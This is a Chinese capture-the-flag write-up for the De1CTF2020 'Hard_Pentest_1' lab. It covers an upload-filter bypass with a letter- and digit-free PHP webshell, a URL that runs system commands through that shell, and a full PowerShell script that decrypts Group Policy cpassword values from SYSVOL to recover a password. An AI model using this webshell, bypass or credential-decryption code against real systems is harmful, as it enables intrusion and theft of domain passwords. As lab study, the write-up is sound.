Hard_Pentest_1 复现

无数字字母的webshell

上传绕过，只需用短标签、P神的无数字字母的webshell绕过即可，上传文件名绕过因为是windows直接大小写绕过。

exp

<?= $_=[] ?> 
<?= $_=@"$_" ?>
<?= $_=$_[('!'=='@')] ?>

<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ = "_".$__ ?>

<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ ?>
<?= $_______ .= $__ ?>

<?= $__ = $_ ?>
<?= @$____ = $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++ + $__++  ?>
<?= $_______ .= $__  ?>

<?= ${$_______}["_"](${$_______}["__"]) ?>

写小马：

http://47.113.219.76/uploads/d8ffd2952b7416f6096c2481dfad4351/6539886cfe4730b929fa714a800aa44a_6.Php?_=system&__=echo "<?php phpinfo()?>">>1.php

域渗透

上传cmd.exe后执行net user看到提示在\\192.168.0.12\Hint

看到一个压缩包里面有flag1和flag2的提示。

SYSVOL还原组策略中保存的密码

参考3gstudent的-域渗透——利用SYSVOL还原组策略中保存的密码。

在域中，存在一个默认的共享路径：

\\<DOMAIN>\SYSVOL\<DOMAIN>\

这里的域可以在ipconfig /all下看到：

直接访问如下地址

//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/

找到对应的策略组id配置文件，如下的Group.xml

//De1CTF2020.lab/SYSVOL/De1CTF2020.lab/Policies/{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}/Machine/Preferences/Groups/

简单的来说就是：\SYSVOL路径中保存了域内用户的一些配置信息->找到HintZip_Pass用户的配置信息->然后找到AES256加密的密钥，由于微软已经公开了私钥，那么就可以把这个登录密钥还原出来->最后解出压缩包。下面的cpasswd就是加密的秘钥

解密脚本

function Get-DecryptedCpassword {
    [CmdletBinding()]
    Param (
        [string] $Cpassword 
    )

    try {
        #Append appropriate padding based on string length  
        $Mod = ($Cpassword.length % 4)

        switch ($Mod) {
        '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
        '2' {$Cpassword += ('=' * (4 - $Mod))}
        '3' {$Cpassword += ('=' * (4 - $Mod))}
        }


        $Base64Decoded = [Convert]::FromBase64String($Cpassword)

        #Create a new AES .NET Crypto Object
        $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
        [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                             0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

        #Set IV to all nulls to prevent dynamic generation of IV value
        $AesIV = New-Object Byte[]($AesObject.IV.Length) 
        $AesObject.IV = $AesIV
        $AesObject.Key = $AesKey
        $DecryptorObject = $AesObject.CreateDecryptor() 
        [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

        return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
    } 

    catch {Write-Error $Error[0]}
}  
Get-DecryptedCpassword "uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08"

执行：

powershell -executionpolicy bypass -file 1.ps1

压缩包的密码是：zL1PpP@sSwO3d

得到flag: